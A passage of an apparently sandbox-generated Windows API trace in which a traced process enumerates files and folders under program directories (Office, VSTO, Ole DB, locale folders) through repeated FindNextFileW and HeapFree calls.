nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0048.189] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.189] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0048.189] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.189] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0048.190] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.190] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0048.190] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.190] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0048.201] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.201] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0048.202] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.202] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0048.202] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.202] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0048.202] FindClose (in: hFindFile=0x4260708 | out: hFindFile=0x4260708) returned 1 [0048.202] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0048.202] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0048.203] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.203] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0048.203] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0048.203] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0048.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.206] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 0 [0048.206] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0048.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0048.206] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0048.207] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0048.207] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0048.207] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0048.207] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0049.718] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0049.718] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TextConv", cAlternateFileName="")) returned 1 [0054.006] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.006] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0054.006] FindClose (in: hFindFile=0x4260748 | out: hFindFile=0x4260748) returned 1 [0054.006] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.006] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Triedit", cAlternateFileName="")) returned 1 [0054.015] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.015] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0054.015] FindClose (in: hFindFile=0x4260688 | out: hFindFile=0x4260688) returned 1 [0054.015] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.015] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VC", cAlternateFileName="")) returned 1 [0054.017] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.017] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VGX", cAlternateFileName="")) returned 1 [0054.018] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.018] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 1 [0054.021] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0054.021] FindNextFileW (in: hFindFile=0x4260448, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0054.022] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.022] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0054.022] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.023] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 0 [0054.023] FindClose (in: hFindFile=0x4260148 | out: hFindFile=0x4260148) returned 1 [0054.023] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42b1088 | out: hHeap=0x5d0000) returned 1 [0054.023] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0054.023] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42b1088 | out: hHeap=0x5d0000) returned 1 [0054.023] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0054.026] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.026] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0054.027] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.027] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0054.027] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.027] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msadc", cAlternateFileName="")) returned 1 [0054.123] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0054.123] FindNextFileW (in: hFindFile=0x4260248, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0054.123] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.123] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0054.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0054.126] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0054.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42c1090 | out: hHeap=0x5d0000) returned 1 [0054.126] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0054.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42b1088 | out: hHeap=0x5d0000) returned 1 [0054.126] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0054.126] FindClose (in: hFindFile=0x4260088 | out: hFindFile=0x4260088) returned 1 [0054.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0054.127] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a307d95, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d0779b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d0779b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x240000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.128] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43010b0 | out: hHeap=0x5d0000) returned 1 [0054.128] FindNextFileW (in: hFindFile=0x4260248, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4ec31b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a4ec31b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4ec31b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0054.128] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43010b0 | out: hHeap=0x5d0000) returned 1 [0054.128] FindNextFileW (in: hFindFile=0x4260248, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0054.128] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43010b0 | out: hHeap=0x5d0000) returned 1 [0054.128] FindNextFileW (in: hFindFile=0x4260248, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de69a90, ftCreationTime.dwHighDateTime=0x1d48498, ftLastAccessTime.dwLowDateTime=0xf99f4140, ftLastAccessTime.dwHighDateTime=0x1d4bbb7, ftLastWriteTime.dwLowDateTime=0xf99f4140, ftLastWriteTime.dwHighDateTime=0x1d4bbb7, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="spray-roman.exe", cAlternateFileName="SPRAY-~1.EXE")) returned 1 [0054.129] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f10a8 | out: hHeap=0x5d0000) returned 1 [0054.129] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348fa7c | out: 